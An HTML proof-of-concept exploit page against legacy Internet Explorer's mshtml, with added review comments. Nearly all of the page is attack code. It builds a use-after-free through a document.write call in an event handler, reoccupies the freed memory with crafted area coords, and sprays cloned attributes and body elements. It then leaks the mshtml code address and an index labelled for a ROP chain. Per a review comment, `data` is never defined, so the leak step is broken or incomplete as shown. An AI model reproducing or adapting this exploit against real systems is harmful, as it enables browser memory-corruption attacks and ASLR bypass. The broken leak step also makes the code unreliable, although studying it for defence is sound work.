<!doctype html>
<HTML>
<head>
<!-- Proof-of-concept page as pasted. The inline script below builds a
     crafted DOM and reports values it reads back via alert(). The APIs it
     depends on (attachEvent, clearAttributes, the onbeforeeditfocus event)
     are legacy Internet Explorer interfaces, and the script's own comments
     name mshtml as the component whose memory is being read. -->
<script>
// Allocates 20 detached <div> elements, each given a long className string.
// Nothing else on the page reads `lfh`, so this looks like a heap-shaping
// step ahead of the allocations made in setinput() (the name suggests the
// Windows low-fragmentation heap, but nothing on the page confirms that).
// Note: `lfh` and the loop index `i` are implicit globals (no declaration).
lfh = new Array(20);
for(i = 0; i < lfh.length; i++) {
  lfh[i] = document.createElement('div');
  lfh[i].className = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
}
// Event handler that loaded() attaches to the first <input>'s onbeforeeditfocus
// and fires with focus(). In order it: (1) writes to the document from inside
// the handler, (2) creates two <area> elements with crafted coords, (3) builds
// one element carrying 0x7ffe attributes and clones it 400 times, and
// (4) rewrites a sparse subset of those attributes, allocating a <body>
// element after each rewrite. Every variable here is an implicit global
// (d, d2, a, mem, bodies, b, i, j); loaded() later reads `mem` directly.
//
// Defensive reading: the author's comments describe the goal as reoccupying
// freed memory, i.e. the write on the first line is the release step and the
// allocations that follow are meant to land in the released regions. The
// observable indicators are a document.write() issued from an event handler,
// tens of thousands of setAttribute() calls, hundreds of cloneNode() copies,
// and <area coords> values far above any plausible pixel coordinate.
function setinput() {
  // Writing to an already-loaded document from inside an event handler; the
  // try/catch hides whatever error this raises. Per the comment below this is
  // what frees the memory the <area> elements are meant to reoccupy.
  try { document.write('Timber'); } catch(e) {}
  // I used 2 area element to make sure we reoccupy freed memory (there is a reason behind this that doesnt fit on this page)
  d = document.createElement('area');
  d.shape = "poly"
  // Our BString pointer is located at: 0x12010020 + 0x8
  // We want to INCrement 0x12010020 + 0x8 + 1 to add 0x100 and not 0x1
  // The code does: inc dword ptr [esi+0A0h] so we need to substract 0xAO from the values leaving 0x1200FF89 which is 302055305 decimal
  // Most entries in the coords string are small placeholder-looking integers;
  // two (289603465 and 2147353180) are far outside any pixel range, which is
  // the detectable signature of this construction.
  d.coords = "1,2,289603465,4,5,0,7,8,9,10,11,12,13,14,13,16,17,18,19,2147353180,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,1,37,38,39,40,41,42,43,44,45,46,47,48";
  d2 = document.createElement('area');
  d2.shape = "poly"
  d2.coords = "1,2,289603465,4,5,0,7,8,9,10,11,12,13,14,13,16,17,18,19,2147353180,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,1,37,38,39,40,41,42,43,44,45,46,47,48";
  // One <div> given 0x7ffe null-valued attributes. clearAttributes() is an
  // IE-only method.
  a = document.createElement("div");
  a.clearAttributes()
  //Step 1
  for(i = 0; i < 0x7ffe; i++) {
    a.setAttribute("attr" + i, null);
  }
  // Step 2: 400 deep clones of that element, so its attribute storage is
  // replicated 400 times.
  mem = new Array(400);
  for(i = 0; i < mem.length; i++) {
    mem[i] = a.cloneNode(1);
  }
  bodies = new Array()
  // Step 3: for every clone, eight attributes (attr0, attr4096, ... attr28672,
  // i.e. every 0x1000th) are replaced with a string whose length loaded()
  // later compares against 0x45, and a <body> element is allocated right
  // after each replacement.
  for(j = 0; j < mem.length; j++) {
    for(i = 0; i < 0x7ffe; i += 0x1000) {
      // Step 3.1
      mem[j].setAttribute("attr" + i, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
      // Step 3.2: the <body> carries fixed property values plus a 'ropchain'
      // attribute holding its position in `bodies`; loaded() later reports an
      // index it decodes out of the leaked data.
      b = document.createElement('body');
      b.title = 'a';
      b.id = 'a';
      b.text = 'a'
      b.bgColor = 1
      b.topMargin = 1
      b.bottomMargin = 1
      b.leftMargin = 1
      b.rightMargin = 4
      b.setAttribute('ropchain', bodies.length) // This will actualy give us the index of the body element we are leaking.
      bodies.push(b);
    }
  }
  // Saving the attributes so Garbage Collection wont kill them accidentally
  // (both arrays are stored as attributes of document.body to keep them
  // reachable; `mem` is additionally read as a global by loaded()).
  document.body.setAttribute('mem', mem)
  document.body.setAttribute('bodies', bodies)
  return true
}
// onload handler (see the <body> tag). Wires setinput() to the first <input>'s
// onbeforeeditfocus through the IE-only attachEvent, triggers it with focus(),
// then scans the attributes setinput() rewrote: any whose string length is no
// longer 0x45 is treated as having had its backing data replaced, and its
// contents are decoded and shown with alert(). Outside legacy IE the
// attachEvent call presumably fails, so the chain never starts.
// Relies on the implicit globals `mem` (assigned in setinput()), `i` and `j`.
function loaded() {
  document.getElementsByTagName('input')[0].attachEvent("onbeforeeditfocus", setinput)
  // Step 4: focusing the input fires onbeforeeditfocus -> setinput().
  document.getElementsByTagName('input')[0].focus();
  // Step 6: revisit exactly the attribute positions setinput() rewrote.
  for(j = 0; j < mem.length; j++) {
    for(i = 0; i < 0x7ffe ; i += 0x1000) {
      //Step 7: a length other than 0x45 (69) means the attribute no longer
      // holds the string that was stored into it.
      if(mem[j].getAttribute("attr" + i).length != 0x45) {
        //Step 9
        // NOTE(review): `data` is never assigned anywhere in this paste, so as
        // written this branch raises a ReferenceError; the paste may be
        // incomplete or depend on a definition outside it.
        LeakInfo = "Size of the attribute is = " + data.length + "\n";
        LeakInfo += "Raw data: \n"
        LeakInfo += escape(data) + "\n\n";
        // Two adjacent UTF-16 code units are combined into one 32-bit value
        // (low half at index 4, high half at index 5); the same is done for
        // indices 14/15 and reported as the body index — presumably the
        // 'ropchain' value setinput() stored on each <body>.
        mshtmlAddress = data.charCodeAt(4) + data.charCodeAt(5) * 0x10000
        LeakInfo += "Address of mshtml code is 0x" + mshtmlAddress.toString(16) + "\n";
        bodyindex = data.charCodeAt(14) + data.charCodeAt(15) * 0x10000
        LeakInfo += "Index of the leaked body = 0x" + bodyindex.toString(16);
        alert(LeakInfo);
      }
    }
  }
}
</script>
</head>
<!-- onload starts the chain by calling loaded(); the single <input> below is
     the element loaded() selects with getElementsByTagName('input')[0]. -->
<body onload="loaded();">
<input value="mydata" type="text"></input>
</body>
</html>